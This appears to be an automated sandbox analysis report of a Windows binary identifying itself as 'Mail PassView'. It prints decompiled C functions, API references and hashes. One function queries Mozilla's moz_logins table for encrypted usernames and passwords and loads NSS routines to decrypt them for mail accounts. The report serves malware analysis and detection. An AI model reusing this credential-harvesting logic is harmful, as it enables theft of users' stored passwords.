                                                                                • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040F7DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$strcpy$HandleLibraryLoadModulememsetstrcat
                                                                                • String ID: \mozsqlite3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                                • API String ID: 3567885941-2042458128
                                                                                • Opcode ID: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                                • Instruction ID: 8fd3bcd04759d815ffa5d5b817f34976dc276f641444eb2ebd63b60ef60fef8a
                                                                                • Opcode Fuzzy Hash: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                                • Instruction Fuzzy Hash: C9416571940308AACB30AF718D85DCBBBF9AB58705F10497BE246E3550E778E685CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E4A4, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E0040E4A4(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
				signed int _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v28;
				intOrPtr _v44;
				struct HWND__* _v48;
				struct HWND__* _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				struct HDC__* _t169;
				struct HWND__* _t171;
				intOrPtr _t223;
				void* _t224;
				intOrPtr _t235;
				struct HWND__* _t237;
				void* _t240;
				intOrPtr* _t274;
				signed int _t275;
				signed int _t276;

				_t274 = __esi;
				_t276 = _t275 & 0xfffffff8;
				E004118A0(0x2198, __ecx);
				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
				_a20 = GetWindowLongA(_t237, 0xfffffff0);
				_a24 = GetWindowLongA(_a4, 0xfffffff0);
				_a96 = GetWindowLongA(_t237, 0xffffffec);
				_a36 = GetWindowLongA(_a4, 0xffffffec);
				GetWindowRect(_t237,  &_a100);
				GetWindowRect(_a4,  &_a60);
				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
				_t240 = _a108 - _a100.x;
				_a4 = _a4 & 0x00000000;
				_a28 = _a68 - _a60.x;
				_a76 = _a112 - _a104;
				_a40 = _a72 - _a64;
				_t169 = GetDC( *(__esi + 4));
				_a16 = _t169;
				if(_t169 == 0) {
					L9:
					_v0 = _v0 & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
						L12:
						_t171 = GetDlgItem( *(_t274 + 4), 1);
						_a36 = _t171;
						GetWindowRect(_t171,  &_a44);
						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
						GetClientRect( *(_t274 + 4),  &_a124);
						GetWindowRect( *(_t274 + 4),  &_a80);
						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
						GetClientRect( *(_t274 + 4),  &_a80);
						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
					}
					_a20 = _a20 | 0x10000000;
					_a24 = _a24 | 0x10000000;
					_a8 = _a12 + 0x10;
					do {
						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
						_v20 = E00401562(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
						_v44 = E00401562(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
						sprintf( &_a80, "%s:", _v52->i);
						_t276 = _t276 + 0xc;
						SetWindowTextA(_v48,  &_a80);
						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
						_v60 = _v60 + 0x14;
						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
						_v68 = _v68 + 1;
					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
					goto L12;
				}
				_t223 = 0;
				_a32 = _a32 & 0;
				_a8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
					L8:
					_t224 = _t223 - _t240;
					_a28 = _a28 - _t224;
					_a60.x = _a60.x + _t224;
					_t240 = _t240 + _t224;
					ReleaseDC( *(_t274 + 4), _a16);
					goto L9;
				}
				_v0 = _a12 + 0x10;
				do {
					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
						_t235 = _a100.x + 0xa;
						if(_t235 > _v8) {
							_v8 = _t235;
						}
					}
					_a16 =  &(_a16->i);
					_v16 = _v16 + 0x14;
				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
				_t223 = _v8;
				goto L8;
			}

























                                                                                0x0040e4a4
                                                                                0x0040e4a7
                                                                                0x0040e4af
                                                                                0x0040e4cd
                                                                                0x0040e4db
                                                                                0x0040e4e8
                                                                                0x0040e4f4
                                                                                0x0040e4fd
                                                                                0x0040e509
                                                                                0x0040e515
                                                                                0x0040e51f
                                                                                0x0040e52a
                                                                                0x0040e53e
                                                                                0x0040e54c
                                                                                0x0040e55d
                                                                                0x0040e561
                                                                                0x0040e566
                                                                                0x0040e575
                                                                                0x0040e581
                                                                                0x0040e585
                                                                                0x0040e58d
                                                                                0x0040e591
                                                                                0x0040e629
                                                                                0x0040e62c
                                                                                0x0040e638
                                                                                0x0040e746
                                                                                0x0040e74b
                                                                                0x0040e757
                                                                                0x0040e75b
                                                                                0x0040e769
                                                                                0x0040e780
                                                                                0x0040e78a
                                                                                0x0040e7d0
                                                                                0x0040e7da
                                                                                0x0040e819
                                                                                0x0040e819
                                                                                0x0040e649
                                                                                0x0040e65a
                                                                                0x0040e65e
                                                                                0x0040e662
                                                                                0x0040e66a
                                                                                0x0040e69c
                                                                                0x0040e6cc
                                                                                0x0040e6e3
                                                                                0x0040e6e8
                                                                                0x0040e6f7
                                                                                0x0040e715
                                                                                0x0040e726
                                                                                0x0040e72b
                                                                                0x0040e72f
                                                                                0x0040e73a
                                                                                0x00000000
                                                                                0x0040e662
                                                                                0x0040e59a
                                                                                0x0040e59c
                                                                                0x0040e5a6
                                                                                0x0040e5aa
                                                                                0x0040e610
                                                                                0x0040e614
                                                                                0x0040e619
                                                                                0x0040e61d
                                                                                0x0040e621
                                                                                0x0040e623
                                                                                0x00000000
                                                                                0x0040e623
                                                                                0x0040e5b3
                                                                                0x0040e5b7
                                                                                0x0040e5de
                                                                                0x0040e5e7
                                                                                0x0040e5ee
                                                                                0x0040e5f0
                                                                                0x0040e5f0
                                                                                0x0040e5ee
                                                                                0x0040e5f4
                                                                                0x0040e5ff
                                                                                0x0040e604
                                                                                0x0040e60c
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                • String ID: %s:$EDIT$STATIC
                                                                                • API String ID: 1703216249-3046471546
                                                                                • Opcode ID: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                                • Instruction ID: 2f6da9a5868e125b8128a3bf626dfa5428397bb468519cd7ccc35e9b597c58da
                                                                                • Opcode Fuzzy Hash: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                                                • Instruction Fuzzy Hash: C9B1DE71108341AFD710DFA8C985A6BBBE9FF88704F008A2DF699D2260D775E814CF16
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004010E5, Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 176COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E004010E5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t62;
				void* _t67;
				struct HWND__* _t68;
				struct HWND__* _t69;
				void* _t72;
				unsigned int _t73;
				struct HWND__* _t75;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				unsigned int _t83;
				struct HWND__* _t85;
				struct HWND__* _t87;
				struct HWND__* _t88;
				struct tagPOINT _t94;
				struct tagPOINT _t96;
				void* _t102;
				void* _t113;

				_t102 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t113 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x417348;
					if(__eflags != 0) {
						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x417348);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t113 + 4), 0x3ee), 0);
					}
					SetWindowTextA( *(_t113 + 4), "Mail PassView");
					SetDlgItemTextA( *(_t113 + 4), 0x3ea, _t113 + 0xc);
					SetDlgItemTextA( *(_t113 + 4), 0x3ec, _t113 + 0x10b);
					E00401085(_t113, __eflags);
					E00406491(_t102,  *(_t113 + 4));
					goto L29;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t62 = _a8;
						__eflags = _t62 - 1;
						if(_t62 != 1) {
							goto L29;
						} else {
							__eflags = _t62 >> 0x10;
							if(_t62 >> 0x10 != 0) {
								goto L29;
							} else {
								EndDialog( *(__ecx + 4), 1);
								DeleteObject( *(_t113 + 0x20c));
								goto L8;
							}
						}
					} else {
						_t67 = _t61 - 0x27;
						if(_t67 == 0) {
							_t68 = GetDlgItem( *(__ecx + 4), 0x3ec);
							__eflags = _a12 - _t68;
							if(_a12 != _t68) {
								__eflags =  *0x417388;
								if( *0x417388 == 0) {
									goto L29;
								} else {
									_t69 = GetDlgItem( *(_t113 + 4), 0x3ee);
									__eflags = _a12 - _t69;
									if(_a12 != _t69) {
										goto L29;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t72 = _t67 - 0xc8;
							if(_t72 == 0) {
								_t73 = _a12;
								_t94 = _t73 & 0x0000ffff;
								_v12.x = _t94;
								_v12.y = _t73 >> 0x10;
								_t75 = GetDlgItem( *(__ecx + 4), 0x3ec);
								_push(_v12.y);
								_a8 = _t75;
								_t76 = ChildWindowFromPoint( *(_t113 + 4), _t94);
								__eflags = _t76 - _a8;
								if(_t76 != _a8) {
									__eflags =  *0x417388;
									if( *0x417388 == 0) {
										goto L29;
									} else {
										_t77 = GetDlgItem( *(_t113 + 4), 0x3ee);
										_push(_v12.y);
										_t78 = ChildWindowFromPoint( *(_t113 + 4), _v12.x);
										__eflags = _t78 - _t77;
										if(_t78 != _t77) {
											goto L29;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorA( *0x416b94, 0x67));
									goto L8;
								}
							} else {
								if(_t72 != 0) {
									L29:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t83 = _a12;
									_t96 = _t83 & 0x0000ffff;
									_v12.x = _t96;
									_v12.y = _t83 >> 0x10;
									_t85 = GetDlgItem( *(__ecx + 4), 0x3ec);
									_push(_v12.y);
									_a8 = _t85;
									if(ChildWindowFromPoint( *(_t113 + 4), _t96) != _a8) {
										__eflags =  *0x417388;
										if( *0x417388 == 0) {
											goto L29;
										} else {
											_t87 = GetDlgItem( *(_t113 + 4), 0x3ee);
											_push(_v12.y);
											_t88 = ChildWindowFromPoint( *(_t113 + 4), _v12);
											__eflags = _t88 - _t87;
											if(_t88 != _t87) {
												goto L29;
											} else {
												_push(0x417388);
												goto L7;
											}
										}
									} else {
										_push(_t113 + 0x10b);
										L7:
										_push( *(_t113 + 4));
										E00406523();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}


























                                                                                0x004010e5
                                                                                0x004010e8
                                                                                0x004010e9
                                                                                0x004010ed
                                                                                0x004010f5
                                                                                0x004010f7
                                                                                0x004012b2
                                                                                0x004012b9
                                                                                0x004012f4
                                                                                0x004012bb
                                                                                0x004012d4
                                                                                0x004012e3
                                                                                0x004012e3
                                                                                0x00401302
                                                                                0x0040131a
                                                                                0x0040132b
                                                                                0x0040132d
                                                                                0x00401335
                                                                                0x00000000
                                                                                0x004010fd
                                                                                0x004010fd
                                                                                0x004010fe
                                                                                0x0040127d
                                                                                0x00401280
                                                                                0x00401284
                                                                                0x00000000
                                                                                0x0040128a
                                                                                0x0040128d
                                                                                0x00401290
                                                                                0x00000000
                                                                                0x00401296
                                                                                0x0040129b
                                                                                0x004012a7
                                                                                0x00000000
                                                                                0x004012a7
                                                                                0x00401290
                                                                                0x00401104
                                                                                0x00401104
                                                                                0x00401107
                                                                                0x0040122e
                                                                                0x00401230
                                                                                0x00401233
                                                                                0x0040125b
                                                                                0x00401262
                                                                                0x00000000
                                                                                0x00401268
                                                                                0x00401270
                                                                                0x00401272
                                                                                0x00401275
                                                                                0x00000000
                                                                                0x0040127b
                                                                                0x00000000
                                                                                0x0040127b
                                                                                0x00401275
                                                                                0x00401235
                                                                                0x00401235
                                                                                0x0040123a
                                                                                0x00401248
                                                                                0x00401250
                                                                                0x00401250
                                                                                0x0040110d
                                                                                0x0040110d
                                                                                0x00401112
                                                                                0x004011a2
                                                                                0x004011ab
                                                                                0x004011b9
                                                                                0x004011bc
                                                                                0x004011bf
                                                                                0x004011c1
                                                                                0x004011c4
                                                                                0x004011d1
                                                                                0x004011d3
                                                                                0x004011d6
                                                                                0x004011f2
                                                                                0x004011f9
                                                                                0x00000000
                                                                                0x004011ff
                                                                                0x00401207
                                                                                0x00401209
                                                                                0x00401214
                                                                                0x00401216
                                                                                0x00401218
                                                                                0x00000000
                                                                                0x0040121e
                                                                                0x00000000
                                                                                0x0040121e
                                                                                0x00401218
                                                                                0x004011d8
                                                                                0x004011d8
                                                                                0x004011e7
                                                                                0x00000000
                                                                                0x004011e7
                                                                                0x00401118
                                                                                0x0040111a
                                                                                0x0040133b
                                                                                0x0040133b
                                                                                0x0040133b
                                                                                0x00401120
                                                                                0x00401120
                                                                                0x00401129
                                                                                0x00401137
                                                                                0x0040113a
                                                                                0x0040113d
                                                                                0x0040113f
                                                                                0x00401142
                                                                                0x00401154
                                                                                0x0040116f
                                                                                0x00401176
                                                                                0x00000000
                                                                                0x0040117c
                                                                                0x00401184
                                                                                0x00401186
                                                                                0x00401191
                                                                                0x00401193
                                                                                0x00401195
                                                                                0x00000000
                                                                                0x0040119b
                                                                                0x0040119b
                                                                                0x00000000
                                                                                0x0040119b
                                                                                0x00401195
                                                                                0x00401156
                                                                                0x0040115c
                                                                                0x0040115d
                                                                                0x0040115d
                                                                                0x00401160
                                                                                0x00401167
                                                                                0x00401169
                                                                                0x00401169
                                                                                0x00401154
                                                                                0x0040111a
                                                                                0x00401112
                                                                                0x00401107
                                                                                0x004010fe
                                                                                0x00401341

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObject
                                                                                • String ID: Mail PassView
                                                                                • API String ID: 3628558512-272225179
                                                                                • Opcode ID: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                                • Instruction ID: a5e01e197ecdabf9e6bdb75eaf1794657044b10619e6b9182d208ef804a260cb
                                                                                • Opcode Fuzzy Hash: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                                                • Instruction Fuzzy Hash: 68518130044248BFEB259F60DE85EAE7BB5EB04700F10853AFA56E65F0C7759D61EB08
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040CE28, Relevance: 42.3, APIs: 21, Strings: 3, Instructions: 311stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 73%
                                                                                			E0040CE28(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
				char* _v8;
				int _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				int* _v28;
				char* _v32;
				int _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				void _v331;
				int _v332;
				void _v587;
				int _v588;
				void _v851;
				char _v852;
				void _v1378;
				short _v1380;
				void _v1995;
				char _v1996;
				void _v2611;
				char _v2612;
				char _v3636;
				char _v4660;
				char _v5684;
				char _v6708;
				char _v7732;
				void _v8755;
				char _v8756;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t115;
				signed int _t116;
				int _t118;
				void* _t130;
				char* _t170;
				intOrPtr _t175;
				char* _t177;
				int _t196;
				intOrPtr _t226;
				void* _t229;
				int* _t232;
				char* _t235;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;

				E004118A0(0x2234, __ecx);
				_t226 = _a4;
				_t232 = _t226 + 0x30;
				_v28 = _t232;
				_t115 = E0040DEEE(_t232, _t226 + 0x362);
				if(_t115 == 0) {
					L43:
					return _t115;
				}
				_t116 = _t232[1];
				_t196 = 0;
				if(_t116 == 0) {
					_t115 = _t116 | 0xffffffff;
				} else {
					_t115 =  *_t116(_t226 + 0x158);
				}
				if(_t115 != _t196) {
					L41:
					if( *_t232 == _t196) {
						goto L43;
					}
					_t118 = SetCurrentDirectoryA( &(_t232[8]));
					 *_t232 = _t196;
					return _t118;
				} else {
					_v36 = _t196;
					if(E0040F64B( &_v72, _t226 + 0x362) == 0) {
						L39:
						_t232 = _v28;
						_t115 = _t232[2];
						if(_t115 != _t196) {
							_t115 =  *_t115();
						}
						goto L41;
					} else {
						_v12 = _t196;
						_v1380 = _t196;
						memset( &_v1378, _t196, 0x208);
						_v852 = _t196;
						memset( &_v851, _t196, 0x104);
						_t239 = _t238 + 0x18;
						MultiByteToWideChar(_t196, _t196, _a8, 0xffffffff,  &_v1380, 0x104);
						WideCharToMultiByte(0xfde9, _t196,  &_v1380, 0xffffffff,  &_v852, 0x104, _t196, _t196);
						if(_v72 != _t196) {
							_v72( &_v852,  &_v12);
						}
						if(_v12 == _t196) {
							goto L39;
						}
						_a8 = _t196;
						if(_v68 != _t196) {
							_v68(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v76);
							_t239 = _t239 + 0x14;
						}
						L11:
						L11:
						if(_v64 == _t196) {
							_t130 = 0xffff;
						} else {
							_t130 = _v64(_a8);
						}
						if(_t130 != 0x64) {
							goto L34;
						}
						_v8756 = _t196;
						memset( &_v8755, _t196, 0x3ff);
						memset( &_v7732, _t196, 0x1400);
						_t240 = _t239 + 0x18;
						_t235 = E0040F7EE( &_v72, _a8, 1);
						_v20 = E0040F7EE( &_v72, _a8, 6);
						_v8 = E0040F7EE( &_v72, _a8, 7);
						_v24 = E0040F7EE( &_v72, _a8, 4);
						_v32 = E0040F7EE( &_v72, _a8, 5);
						_v16 = E0040F7EE( &_v72, _a8, 2);
						if(_t235 != _t196) {
							strcpy( &_v8756, _t235);
						}
						if(_v20 != _t196) {
							strcpy( &_v7732, _v20);
						}
						if(_v8 != _t196) {
							strcpy( &_v6708, _v8);
						}
						if(_v24 != _t196) {
							strcpy( &_v5684, _v24);
						}
						if(_v32 != _t196) {
							strcpy( &_v4660, _v32);
						}
						if(_v16 != _t196) {
							strcpy( &_v3636, _v16);
						}
						_v332 = _t196;
						memset( &_v331, _t196, 0xff);
						_v588 = _t196;
						memset( &_v587, _t196, 0xff);
						_t239 = _t240 + 0x18;
						E0040CD27(_v8, _t226,  &_v588);
						E0040CD27(_v20, _t226,  &_v332);
						_v8 = _t196;
						if( *((intOrPtr*)(_t226 + 0x474)) > _t196) {
							_v16 = _t226 + 0x468;
							do {
								_t237 = E0040D438(_v8, _v16);
								_v2612 = _t196;
								memset( &_v2611, _t196, 0x261);
								_v1996 = _t196;
								memset( &_v1995, _t196, 0x261);
								_t86 = _t237 + 0x104; // 0x104
								_t229 = _t86;
								sprintf( &_v2612, "mailbox://%s", _t229);
								sprintf( &_v1996, "imap://%s", _t229);
								_push( &_v3636);
								_t170 =  &_v2612;
								_push(_t170);
								L004115B2();
								_t239 = _t239 + 0x38;
								if(_t170 == 0) {
									L31:
									_t94 = _t237 + 0x304; // 0x304
									E004060D0(0xff, _t94,  &_v588);
									_t96 = _t237 + 0x204; // 0x204
									E004060D0(0xff, _t96,  &_v332);
									_t196 = 0;
									goto L32;
								}
								_push( &_v3636);
								_t177 =  &_v1996;
								_push(_t177);
								L004115B2();
								if(_t177 != 0) {
									goto L32;
								}
								goto L31;
								L32:
								_v8 =  &(_v8[1]);
								_t175 = _a4;
							} while (_v8 <  *((intOrPtr*)(_t175 + 0x474)));
							_t226 = _t175;
						}
						goto L11;
						L34:
						if(_a8 != _t196 && _v48 != _t196) {
							_v48(_a8);
						}
						if(_v44 != _t196) {
							_v44(_v12);
						}
						goto L39;
					}
				}
			}























































                                                                                0x0040ce30
                                                                                0x0040ce38
                                                                                0x0040ce41
                                                                                0x0040ce45
                                                                                0x0040ce48
                                                                                0x0040ce4f
                                                                                0x0040d1e9
                                                                                0x0040d1e9
                                                                                0x0040d1e9
                                                                                0x0040ce55
                                                                                0x0040ce58
                                                                                0x0040ce5c
                                                                                0x0040ce6a
                                                                                0x0040ce5e
                                                                                0x0040ce65
                                                                                0x0040ce67
                                                                                0x0040ce6f
                                                                                0x0040d1d5
                                                                                0x0040d1d7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d1dd
                                                                                0x0040d1e3
                                                                                0x00000000
                                                                                0x0040ce75
                                                                                0x0040ce7f
                                                                                0x0040ce89
                                                                                0x0040d1c9
                                                                                0x0040d1c9
                                                                                0x0040d1cc
                                                                                0x0040d1d1
                                                                                0x0040d1d3
                                                                                0x0040d1d3
                                                                                0x00000000
                                                                                0x0040ce8f
                                                                                0x0040ce9c
                                                                                0x0040ce9f
                                                                                0x0040cea6
                                                                                0x0040ceb9
                                                                                0x0040cebf
                                                                                0x0040cec4
                                                                                0x0040ced6
                                                                                0x0040cef5
                                                                                0x0040cefe
                                                                                0x0040cf0b
                                                                                0x0040cf0f
                                                                                0x0040cf13
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cf1c
                                                                                0x0040cf1f
                                                                                0x0040cf33
                                                                                0x0040cf36
                                                                                0x0040cf36
                                                                                0x00000000
                                                                                0x0040cf39
                                                                                0x0040cf3c
                                                                                0x0040cf47
                                                                                0x0040cf3e
                                                                                0x0040cf41
                                                                                0x0040cf44
                                                                                0x0040cf4f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cf62
                                                                                0x0040cf68
                                                                                0x0040cf7a
                                                                                0x0040cf7f
                                                                                0x0040cf94
                                                                                0x0040cfa3
                                                                                0x0040cfb3
                                                                                0x0040cfc3
                                                                                0x0040cfd3
                                                                                0x0040cfe0
                                                                                0x0040cfe3
                                                                                0x0040cfed
                                                                                0x0040cff3
                                                                                0x0040cff7
                                                                                0x0040d003
                                                                                0x0040d009
                                                                                0x0040d00d
                                                                                0x0040d019
                                                                                0x0040d01f
                                                                                0x0040d023
                                                                                0x0040d02f
                                                                                0x0040d035
                                                                                0x0040d039
                                                                                0x0040d045
                                                                                0x0040d04b
                                                                                0x0040d04f
                                                                                0x0040d05b
                                                                                0x0040d061
                                                                                0x0040d070
                                                                                0x0040d076
                                                                                0x0040d084
                                                                                0x0040d08a
                                                                                0x0040d08f
                                                                                0x0040d09e
                                                                                0x0040d0af
                                                                                0x0040d0ba
                                                                                0x0040d0bd
                                                                                0x0040d0c9
                                                                                0x0040d0cc
                                                                                0x0040d0dd
                                                                                0x0040d0e7
                                                                                0x0040d0ed
                                                                                0x0040d0fb
                                                                                0x0040d101
                                                                                0x0040d106
                                                                                0x0040d106
                                                                                0x0040d119
                                                                                0x0040d12b
                                                                                0x0040d136
                                                                                0x0040d137
                                                                                0x0040d13d
                                                                                0x0040d13e
                                                                                0x0040d143
                                                                                0x0040d148
                                                                                0x0040d163
                                                                                0x0040d16a
                                                                                0x0040d175
                                                                                0x0040d181
                                                                                0x0040d187
                                                                                0x0040d18e
                                                                                0x00000000
                                                                                0x0040d18e
                                                                                0x0040d150
                                                                                0x0040d151
                                                                                0x0040d157
                                                                                0x0040d158
                                                                                0x0040d161
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d190
                                                                                0x0040d190
                                                                                0x0040d193
                                                                                0x0040d199
                                                                                0x0040d1a5
                                                                                0x0040d1a5
                                                                                0x00000000
                                                                                0x0040d1ac
                                                                                0x0040d1af
                                                                                0x0040d1b9
                                                                                0x0040d1bc
                                                                                0x0040d1c0
                                                                                0x0040d1c5
                                                                                0x0040d1c8
                                                                                0x00000000
                                                                                0x0040d1c0
                                                                                0x0040ce89

                                                                                APIs
                                                                                  • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF0F
                                                                                  • Part of subcall function 0040DEEE: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                                  • Part of subcall function 0040DEEE: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                                  • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF62
                                                                                  • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF6C
                                                                                  • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF7A
                                                                                  • Part of subcall function 0040DEEE: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                                  • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                                  • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                                  • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                                  • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                                  • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                                  • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                                  • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                                  • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                                • memset.MSVCRT ref: 0040CEA6
                                                                                • memset.MSVCRT ref: 0040CEBF
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D314,000000FF,?,00000104,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CED6
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CEF5
                                                                                • memset.MSVCRT ref: 0040CF68
                                                                                • memset.MSVCRT ref: 0040CF7A
                                                                                • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040CFED
                                                                                • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D003
